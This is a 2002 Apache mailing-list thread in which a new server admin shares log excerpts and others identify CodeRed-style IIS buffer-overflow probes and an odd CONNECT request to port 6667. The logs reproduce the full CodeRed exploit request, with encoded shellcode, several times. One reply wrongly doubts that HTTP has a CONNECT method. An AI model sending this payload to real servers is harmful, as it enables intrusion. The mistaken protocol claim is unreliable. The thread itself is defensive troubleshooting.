You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Gary Turner <kk...@swbell.net> on 2002/07/11 10:38:34 UTC
access & error logs -- attempted crack?
Notice the access and error log excerpts. Being brand new to this, I
can only wonder what this is all about. Are they innocent (unlikely, I
think) or attempts to get into my box? Note the one reference to port
6667. Was this a try at using me for chat relay/misdirection?
Any explanation of these log entries will be deeply appreciated.
==========================================================
>From the access.log
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN61.59.67.62
- - [10/Jul/2002:19:50:28 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328 "-" "-"
200.165.231.85 - - [10/Jul/2002:20:29:46 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328 "-" "-"
207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667
HTTP/1.0" 405 307 "-" "-"
62.248.37.51 - - [11/Jul/2002:02:38:23 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328 "-" "-"
(notice 207.114.6.10 --> connect 207.114.6.11:6667)
===============================================================
>From the error.log
[Wed Jul 10 08:14:56 2002] [error] [client 65.29.2.20] Client sent
malformed Host header
[Wed Jul 10 19:50:28 2002] [error] [client 61.59.67.62] Client sent
malformed Host header
[Wed Jul 10 20:29:46 2002] [error] [client 200.165.231.85] Client sent
malformed Host header
[Thu Jul 11 02:38:23 2002] [error] [client 62.248.37.51] Client sent
malformed Host header
--
gt
It ain't so much what you don't know that gets you in trouble---
it's what you do know that ain't so.--unk
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: access & error logs -- attempted crack?
Posted by Robert Andersson <ro...@profundis.nu>.
Sorry for not replying soner. The 6667 stuff do really puzzle me, and I
doubt I will be able to give you any answer.
What we see is, that something (on 207.114.6.10) connected to yourip:80 and
sent Apache a request like:
"CONNECT 207.114.6.11:6667 HTTP/1.0"
where you would normally see something like:
"GET /folder/file.html HTTP/1.1"
Apache naturally respondes with a 405 - Method Not Allowed, where the method
would be "CONNECT". I have really no idea why anyone would be doing this,
but I'm somewhat sure it has nothing to do with the other (CodeRed) log
lines. I don't think there is a CONNECT method in the HTTP standard; I'm not
certain but almost. I should go look it up, but too lazy right now ;-).
Anyway, I don't think you need to worry about that one either.
Regards,
Robert Andersson
----- Original Message -----
From: "Gary Turner" <kk...@swbell.net>
To: <us...@httpd.apache.org>; "Robert Andersson" <ro...@profundis.nu>
Sent: Thursday, July 11, 2002 9:35 PM
Subject: Re: access & error logs -- attempted crack?
> On Thu, 11 Jul 2002 10:44:43 +0200, Robert Andersson wrote:
>
> >Looks like CodeRed or similar clone, which try to exploit a buffer
overflow
> >in MS IIS. It´'s now known that Apache (<1.3.26 && <2.0.39) has a similar
> >bug, but I don't know how such an attack would look like. But these log
> >entries are certainly intended for IIS.
>
> Thanks to both Robert and Stephen for timely, helpful answers. I knew
> there was a reason to run Linux :)
>
> On the other access.log entry,
>
> 207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667
> HTTP/1.0" 405 307 "-" "-"
>
> can anyone explain this? IRC port?
> --
> gt
> It ain't so much what you don't know that gets you in trouble---
> it's what you do know that ain't so.--unk
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: access & error logs -- attempted crack?
Posted by Gary Turner <kk...@swbell.net>.
On Thu, 11 Jul 2002 10:44:43 +0200, Robert Andersson wrote:
>Looks like CodeRed or similar clone, which try to exploit a buffer overflow
>in MS IIS. It´'s now known that Apache (<1.3.26 && <2.0.39) has a similar
>bug, but I don't know how such an attack would look like. But these log
>entries are certainly intended for IIS.
Thanks to both Robert and Stephen for timely, helpful answers. I knew
there was a reason to run Linux :)
On the other access.log entry,
207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667
HTTP/1.0" 405 307 "-" "-"
can anyone explain this? IRC port?
--
gt
It ain't so much what you don't know that gets you in trouble---
it's what you do know that ain't so.--unk
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: access & error logs -- attempted crack?
Posted by Robert Andersson <ro...@profundis.nu>.
Looks like CodeRed or similar clone, which try to exploit a buffer overflow
in MS IIS. It´'s now known that Apache (<1.3.26 && <2.0.39) has a similar
bug, but I don't know how such an attack would look like. But these log
entries are certainly intended for IIS.
Regards,
Robert Andersson
----- Original Message -----
From: "Gary Turner" <kk...@swbell.net>
To: "Apache Users" <us...@httpd.apache.org>
Sent: Thursday, July 11, 2002 10:38 AM
Subject: access & error logs -- attempted crack?
> Notice the access and error log excerpts. Being brand new to this, I
> can only wonder what this is all about. Are they innocent (unlikely, I
> think) or attempts to get into my box? Note the one reference to port
> 6667. Was this a try at using me for chat relay/misdirection?
>
> Any explanation of these log entries will be deeply appreciated.
>
> ==========================================================
>
> >From the access.log
>
>
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN6
1.59.67.62
> - - [10/Jul/2002:19:50:28 -0500] "GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 328 "-" "-"
>
> 200.165.231.85 - - [10/Jul/2002:20:29:46 -0500] "GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 328 "-" "-"
>
> 207.114.6.10 - - [10/Jul/2002:21:32:02 -0500] "CONNECT 207.114.6.11:6667
> HTTP/1.0" 405 307 "-" "-"
>
> 62.248.37.51 - - [11/Jul/2002:02:38:23 -0500] "GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 328 "-" "-"
>
> (notice 207.114.6.10 --> connect 207.114.6.11:6667)
> ===============================================================
> From the error.log
>
>
> [Wed Jul 10 08:14:56 2002] [error] [client 65.29.2.20] Client sent
> malformed Host header
>
> [Wed Jul 10 19:50:28 2002] [error] [client 61.59.67.62] Client sent
> malformed Host header
> [Wed Jul 10 20:29:46 2002] [error] [client 200.165.231.85] Client sent
> malformed Host header
> [Thu Jul 11 02:38:23 2002] [error] [client 62.248.37.51] Client sent
> malformed Host header
>
>
>
> --
> gt
> It ain't so much what you don't know that gets you in trouble---
> it's what you do know that ain't so.--unk
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org